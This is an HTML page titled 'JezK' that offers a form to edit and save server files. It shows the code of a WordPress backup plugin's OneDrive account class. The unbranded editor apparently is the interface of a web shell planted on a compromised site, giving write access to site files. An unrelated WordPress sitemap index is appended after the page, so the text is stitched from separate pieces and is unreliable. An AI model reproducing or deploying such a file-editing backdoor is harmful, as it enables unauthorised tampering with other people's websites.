
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: class-onedrive-account.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
// @codingStandardsIgnoreLine
namespace Onedrive;

if (!defined(&#039;UPDRAFTPLUS_DIR&#039;)) die(&#039;No direct access allowed.&#039;);

final class UpdraftPlus_OneDrive_Account {
	
	public static $types = array(
		&#039;com&#039; =&gt; array(
			&#039;client_id&#039; =&gt; &#039;276d9423-7d0c-41be-a3e1-4cdad89dc36f&#039;,
			&#039;override_client_id_const_name&#039; =&gt; &#039;UPDRAFTPLUS_ONEDRIVE_CLIENT_ID&#039;,

			&#039;graph_url&#039; =&gt; &#039;https://graph.microsoft.com&#039;,
			&#039;api_url&#039; =&gt; &#039;https://graph.microsoft.com/v1.0/&#039;,
			&#039;auth_url&#039; =&gt; &#039;https://login.microsoftonline.com/common/oauth2/v2.0/authorize&#039;,
			&#039;token_url&#039; =&gt; &#039;https://login.microsoftonline.com/common/oauth2/v2.0/token&#039;,
		),
		&#039;de&#039; =&gt; array(
			&#039;client_id&#039; =&gt; &#039;7cc3beb4-daab-4a59-b091-c4c2319d8d2d&#039;,
			&#039;override_client_id_const_name&#039; =&gt; &#039;UPDRAFTPLUS_ONEDRIVE_GERMANY_CLIENT_ID&#039;,

			&#039;graph_url&#039; =&gt; &#039;https://graph.microsoft.de&#039;,
			&#039;api_url&#039; =&gt; &#039;https://graph.microsoft.de/v1.0/&#039;,
			&#039;auth_url&#039; =&gt; &#039;https://login.microsoftonline.de/common/oauth2/v2.0/authorize&#039;,
			&#039;token_url&#039; =&gt; &#039;https://login.microsoftonline.de/common/oauth2/v2.0/token&#039;,
		),
	);

	/**
	 * Get client id
	 *
	 * @param string $endpoint_tld Account type endpoint tld
	 * @return string Client id
	 */
	public static function get_client_id($endpoint_tld = &#039;com&#039;) {
		$valid_endpoint_tlds = array_keys(self::$types);
		if (in_array($endpoint_tld, $valid_endpoint_tlds)) {
			if (defined(self::$types[$endpoint_tld][&#039;override_client_id_const_name&#039;])) {
				return constant(self::$types[$endpoint_tld][&#039;override_client_id_const_name&#039;]);
			} else {
				return self::$types[$endpoint_tld][&#039;client_id&#039;];
			}
		}
		return &#039;&#039;;
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
